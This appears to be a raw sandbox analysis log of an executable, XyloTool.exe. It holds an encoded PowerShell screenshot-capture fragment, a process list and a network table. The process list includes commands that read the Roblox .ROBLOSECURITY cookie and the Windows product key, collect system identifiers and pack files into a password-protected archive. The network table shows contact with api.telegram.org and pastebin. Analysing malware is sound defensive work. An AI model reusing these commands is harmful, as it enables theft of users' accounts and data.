AAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ccqxalhk\ccqxalhk.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2482.tmp" "c:\Users\Admin\AppData\Local\Temp\ccqxalhk\CSCC41004D0810A437BB340FEF23CC46783.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI89122\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\jh09D.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI89122\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI89122\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\jh09D.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Users\Admin\Desktop\XyloTool.exe
"C:\Users\Admin\Desktop\XyloTool.exe"
C:\Users\Admin\Desktop\XyloTool.exe
"C:\Users\Admin\Desktop\XyloTool.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
| N/A | 127.0.0.1:54383 | tcp | |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 34.117.188.166:443 | spocs.getpocket.com | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 52.33.96.36:443 | shavar.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 8.8.8.8:53 | 36.96.33.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:54390 | tcp | |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:80 | pastebin.com | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | services.vlitag.com | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 172.67.21.227:443 | services.vlitag.com | tcp |
| US | 8.8.8.8:53 | services.vlitag.com | udp |
| US | 8.8.8.8:53 | services.vlitag.com | udp |
| US | 172.67.21.227:443 | services.vlitag.com | udp |
| US | 172.67.21.227:443 | services.vlitag.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | dsp.vlitag.com | udp |
| US | 8.8.8.8:53 | cmp.inmobi.com | udp |
| US | 8.8.8.8:53 | s3.vlitag.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | imasdk.googleapis.com | udp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| US | 172.67.21.227:443 | s3.vlitag.com | tcp |
| US | 8.8.8.8:53 | dsp.vlitag.com | udp |
| US | 104.22.58.199:443 | dsp.vlitag.com | tcp |
| US | 104.22.58.199:443 | dsp.vlitag.com | tcp |
| US | 8.8.8.8:53 | s3.vlitag.com | udp |
| US | 8.8.8.8:53 | d23sp3kzv1t6m5.cloudfront.net | udp |
| GB | 142.250.187.202:443 | imasdk.googleapis.com | tcp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.21.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dsp.vlitag.com | udp |
| US | 8.8.8.8:53 | d23sp3kzv1t6m5.cloudfront.net | udp |
| US | 8.8.8.8:53 | s3.vlitag.com | udp |
| US | 172.67.21.227:443 | s3.vlitag.com | udp |
| US | 8.8.8.8:53 | d1ykf07e75w7ss.cloudfront.net | udp |
| US | 104.22.58.199:443 | s3.vlitag.com | udp |
| US | 8.8.8.8:53 | imasdk.googleapis.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | d1ykf07e75w7ss.cloudfront.net | udp |
| US | 8.8.8.8:53 | imasdk.googleapis.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| BG | 18.244.87.123:443 | d23sp3kzv1t6m5.cloudfront.net | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| BG | 18.165.68.76:443 | d1ykf07e75w7ss.cloudfront.net | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| BG | 18.165.68.76:443 | d1ykf07e75w7ss.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.58.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.68.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.87.244.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.cmp.inmobi.com | udp |
| DE | 18.184.161.125:443 | api.cmp.inmobi.com | tcp |
| US | 8.8.8.8:53 | choice-apis-prod-2120274730.eu-central-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | choice-apis-prod-2120274730.eu-central-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | 125.161.184.18.in-addr.arpa | udp |
| GB | 142.250.187.202:443 | imasdk.googleapis.com | udp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | px.vliplatform.com | udp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| US | 151.101.65.229:443 | cdn.jsdelivr.net | tcp |
| US | 8.8.8.8:53 | jsdelivr.map.fastly.net | udp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| DE | 141.101.120.11:443 | px.vliplatform.com | tcp |
| DE | 141.101.120.11:443 | px.vliplatform.com | tcp |
| DE | 141.101.120.11:443 | px.vliplatform.com | tcp |
| DE | 141.101.120.11:443 | px.vliplatform.com | tcp |
| US | 8.8.8.8:53 | px.vliplatform.com | udp |
| DE | 141.101.120.11:443 | px.vliplatform.com | tcp |
| BG | 18.244.86.194:443 | aax.amazon-adsystem.com | tcp |
| BG | 18.244.86.194:443 | aax.amazon-adsystem.com | tcp |
| BG | 18.244.86.194:443 | aax.amazon-adsystem.com | tcp |
| BG | 18.244.86.194:443 | aax.amazon-adsystem.com | tcp |
| DE | 141.101.120.11:443 | px.vliplatform.com | tcp |
| US | 8.8.8.8:53 | jsdelivr.map.fastly.net | udp |
| BG | 18.244.86.194:443 | aax.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | px.vliplatform.com | udp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | d1jvc9b8z3vcjs.cloudfront.net | udp |
| US | 8.8.8.8:53 | d1jvc9b8z3vcjs.cloudfront.net | udp |
| US | 151.101.65.229:443 | jsdelivr.map.fastly.net | udp |
| BG | 18.244.86.194:443 | d1jvc9b8z3vcjs.cloudfront.net | tcp |
| DE | 141.101.120.11:443 | px.vliplatform.com | udp |
| US | 8.8.8.8:53 | 229.65.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.120.101.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.86.244.18.in-addr.arpa | udp |
| BG | 18.165.61.19:443 | config.aps.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | script.4dex.io | udp |
| US | 8.8.8.8:53 | prebid-eu.creativecdn.com | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 8.8.8.8:53 | useast.quantumdex.io | udp |
| US | 8.8.8.8:53 | shb.richaudience.com | udp |
| US | 8.8.8.8:53 | exchange.cootlogix.com | udp |
| US | 104.26.9.169:443 | script.4dex.io | tcp |
| US | 8.8.8.8:53 | script.4dex.io | udp |
| US | 8.8.8.8:53 | prebid-eu.creativecdn.com | udp |
| US | 8.8.8.8:53 | ib.anycast.adnxs.com | udp |
| US | 104.22.37.96:443 | useast.quantumdex.io | tcp |
| US | 104.22.37.96:443 | useast.quantumdex.io | tcp |
| US | 134.209.74.245:443 | exchange.cootlogix.com | tcp |
| US | 134.209.74.245:443 | exchange.cootlogix.com | tcp |
| US | 8.8.8.8:53 | script.4dex.io | udp |
| US | 8.8.8.8:53 | prebid-eu.creativecdn.com | udp |
| US | 8.8.8.8:53 | ib.anycast.adnxs.com | udp |
| US | 8.8.8.8:53 | shb.richaudience.com | udp |
| US | 8.8.8.8:53 | useast.quantumdex.io | udp |
| US | 8.8.8.8:53 | hlno24mlb.puzztake.com | udp |
| US | 8.8.8.8:53 | hlno24mlb.puzztake.com | udp |
| US | 8.8.8.8:53 | shb.richaudience.com | udp |
| US | 8.8.8.8:53 | useast.quantumdex.io | udp |
| US | 8.8.8.8:53 | cadmus.script.ac | udp |
| US | 104.26.9.169:443 | script.4dex.io | tcp |
| US | 104.18.23.145:443 | cadmus.script.ac | tcp |
| US | 8.8.8.8:53 | cadmus.script.ac | udp |
| US | 8.8.8.8:53 | cadmus.script.ac | udp |
| US | 8.8.8.8:53 | 19.61.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.37.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.9.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.74.209.134.in-addr.arpa | udp |
| US | 104.22.37.96:443 | useast.quantumdex.io | udp |
| NL | 185.184.8.90:443 | prebid-eu.creativecdn.com | tcp |
| DE | 37.252.171.149:443 | ib.adnxs.com | tcp |
| DE | 178.63.241.79:443 | shb.richaudience.com | tcp |
| DE | 178.63.241.79:443 | shb.richaudience.com | tcp |
| DE | 178.63.241.79:443 | shb.richaudience.com | tcp |
| DE | 178.63.241.79:443 | shb.richaudience.com | tcp |
| NL | 185.184.8.90:443 | prebid-eu.creativecdn.com | tcp |
| DE | 37.252.171.149:443 | ib.adnxs.com | tcp |
| US | 8.8.8.8:53 | ap.lijit.com | udp |
| US | 8.8.8.8:53 | blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | cdn.prod.uidapi.com | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 8.8.8.8:53 | connectid.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | oa.openxcdn.net | udp |
| US | 8.8.8.8:53 | cdn-ima.33across.com | udp |
| US | 8.8.8.8:53 | invstatic101.creativecdn.com | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| BG | 18.165.66.36:443 | cdn.prod.uidapi.com | tcp |
| US | 8.8.8.8:53 | 3ce137e8497246586102bfe9211fecf4.safeframe.googlesyndication.com | udp |
| US | 34.102.146.192:443 | oa.openxcdn.net | tcp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 8.8.8.8:53 | d2avimlm6gq3h9.cloudfront.net | udp |
| GB | 172.217.169.65:443 | 3ce137e8497246586102bfe9211fecf4.safeframe.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 8.8.8.8:53 | d2avimlm6gq3h9.cloudfront.net | udp |
| US | 8.8.8.8:53 | oa.openxcdn.net | udp |
| US | 8.8.8.8:53 | oa.openxcdn.net | udp |
| US | 8.8.8.8:53 | invstatic101.creativecdn.com | udp |
| US | 8.8.8.8:53 | cdn-ima.33across.com.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | static.nl3.vip.prod.criteo.net | udp |
| US | 8.8.8.8:53 | invstatic101.creativecdn.com | udp |
| US | 34.102.146.192:443 | oa.openxcdn.net | udp |
| US | 8.8.8.8:53 | cdn-ima.33across.com.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | oajs.openx.net | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | static.nl3.vip.prod.criteo.net | udp |
| US | 8.8.8.8:53 | 145.23.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.8.184.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.171.252.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.241.63.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.146.102.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.66.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | d1402xccwihzsp.cloudfront.net | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| GB | 172.217.169.65:443 | 3ce137e8497246586102bfe9211fecf4.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | d1402xccwihzsp.cloudfront.net | udp |
| US | 8.8.8.8:53 | pagead-googlehosted.l.google.com | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | oajs.openx.net | udp |
| US | 8.8.8.8:53 | pagead-googlehosted.l.google.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | oajs.openx.net | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| IE | 54.246.149.56:443 | ap.lijit.com | tcp |
| IE | 54.246.149.56:443 | ap.lijit.com | tcp |
| US | 104.22.53.86:443 | cdn.id5-sync.com | tcp |
| BG | 52.85.5.64:443 | d1402xccwihzsp.cloudfront.net | tcp |
| NL | 178.250.1.3:443 | static.nl3.vip.prod.criteo.net | tcp |
| US | 172.64.152.89:443 | cdn-ima.33across.com.cdn.cloudflare.net | tcp |
| US | 34.96.70.87:443 | invstatic101.creativecdn.com | tcp |
| BG | 18.244.87.57:443 | tags.crwdcntrl.net | tcp |
| US | 34.120.135.53:443 | oajs.openx.net | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| US | 34.96.70.87:443 | invstatic101.creativecdn.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | a.teads.tv | udp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| US | 34.120.135.53:443 | oajs.openx.net | udp |
| US | 8.8.8.8:53 | e9957.b.akamaiedge.net | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | google-bidout-d.openx.net | udp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 8.8.8.8:53 | gum.nl3.vip.prod.criteo.com | udp |
| US | 8.8.8.8:53 | e9957.b.akamaiedge.net | udp |
| US | 34.98.64.218:443 | google-bidout-d.openx.net | tcp |
| US | 8.8.8.8:53 | google-bidout-d.openx.net | udp |
| DE | 141.95.98.64:443 | id5-sync.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | gum.nl3.vip.prod.criteo.com | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | google-bidout-d.openx.net | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| IE | 52.49.45.15:443 | bcp.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | cdn.mediago.io | udp |
| US | 34.98.64.218:443 | google-bidout-d.openx.net | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| BG | 18.244.87.125:443 | cdn.mediago.io | tcp |
| US | 8.8.8.8:53 | cdn.mediago.io | udp |
| US | 8.8.8.8:53 | cdn.mediago.io | udp |
| US | 8.8.8.8:53 | trace-eu.mediago.io | udp |
| US | 8.8.8.8:53 | images.mediago.io | udp |
| BG | 18.244.87.125:443 | cdn.mediago.io | tcp |
| NL | 35.214.168.80:443 | trace-eu.mediago.io | tcp |
| US | 8.8.8.8:53 | trace-eu.mediago.io | udp |
| US | 34.111.60.239:443 | images.mediago.io | tcp |
| US | 8.8.8.8:53 | images.mediago.io | udp |
| US | 8.8.8.8:53 | trace-eu.mediago.io | udp |
| NL | 35.214.168.80:443 | trace-eu.mediago.io | tcp |
| US | 8.8.8.8:53 | images.mediago.io | udp |
| US | 8.8.8.8:53 | dnacdn.net | udp |
| US | 8.8.8.8:53 | ag.gbc.criteo.com | udp |
| US | 8.8.8.8:53 | gem.gbc.criteo.com | udp |
| US | 8.8.8.8:53 | gbc1.nl3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | gbc0.fr3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | gbc1.nl3.eu.criteo.com | udp |
| NL | 35.214.168.80:443 | trace-eu.mediago.io | udp |
| FR | 178.250.7.13:443 | dnacdn.net | tcp |
| US | 8.8.8.8:53 | gbc0.fr3.eu.criteo.com | udp |
| NL | 185.235.87.35:443 | gbc1.nl3.eu.criteo.com | tcp |
| FR | 185.235.86.3:443 | gbc0.fr3.eu.criteo.com | tcp |
| US | 34.111.60.239:443 | images.mediago.io | udp |
| US | 8.8.8.8:53 | dnacdn.net | udp |
| US | 8.8.8.8:53 | 89.152.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.53.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.70.96.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.135.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.149.246.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.5.85.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.87.244.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.64.98.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.98.95.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.45.49.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.87.244.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.168.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.60.111.34.in-addr.arpa | udp |
| GB | 2.21.189.110:443 | e9957.b.akamaiedge.net | tcp |
| US | 8.8.8.8:53 | dnacdn.net | udp |
| US | 8.8.8.8:53 | gtrace.mediago.io | udp |
| NL | 35.214.168.80:443 | gtrace.mediago.io | tcp |
| NL | 35.214.168.80:443 | gtrace.mediago.io | tcp |
| US | 8.8.8.8:53 | gtrace.mediago.io | udp |
| US | 8.8.8.8:53 | gtrace.mediago.io | udp |
| NL | 35.214.168.80:443 | gtrace.mediago.io | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| GB | 172.217.16.226:443 | cm.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| GB | 172.217.16.226:443 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 13.7.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.86.235.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.87.235.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.189.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | w.cedeene.com | udp |
| US | 8.8.8.8:53 | b-eu1.marketperf.com | udp |
| US | 8.8.8.8:53 | ghent-gce-nl.bidswitch.net | udp |
| US | 8.8.8.8:53 | z.moatads.com | udp |
| US | 8.8.8.8:53 | pxdrop.lijit.com | udp |
| US | 8.8.8.8:53 | imp-ew1-secondary.lijit.com | udp |
